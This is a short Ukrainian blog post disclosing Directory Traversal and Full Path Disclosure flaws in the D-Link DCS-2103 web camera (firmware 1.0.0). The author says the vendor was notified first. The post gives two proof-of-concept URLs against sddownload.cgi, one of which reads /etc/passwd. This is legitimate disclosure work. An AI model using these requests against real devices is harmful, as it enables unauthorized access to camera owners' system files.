DT та FPD уразливості в D-Link DCS-2103
17:22 15.11.201411.07.2014
Сьогодні я виявив уразливості в D-Link DCS-2103 (веб камера). Зокрема Directory Traversal та Full path disclosure уразливості. Це перша частина дірок в DCS-2103.
Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DAP 1150 та D-Link DAP-1360.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
15.11.2014
Directory Traversal (Arbitrary File Download) (WASC-33):
http://site/cgi-bin/sddownload.cgi?file=/../../etc/passwd
Full path disclosure (WASC-13):
http://site/cgi-bin/sddownload.cgi?file=/
Уразлива версія D-Link DCS-2103, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.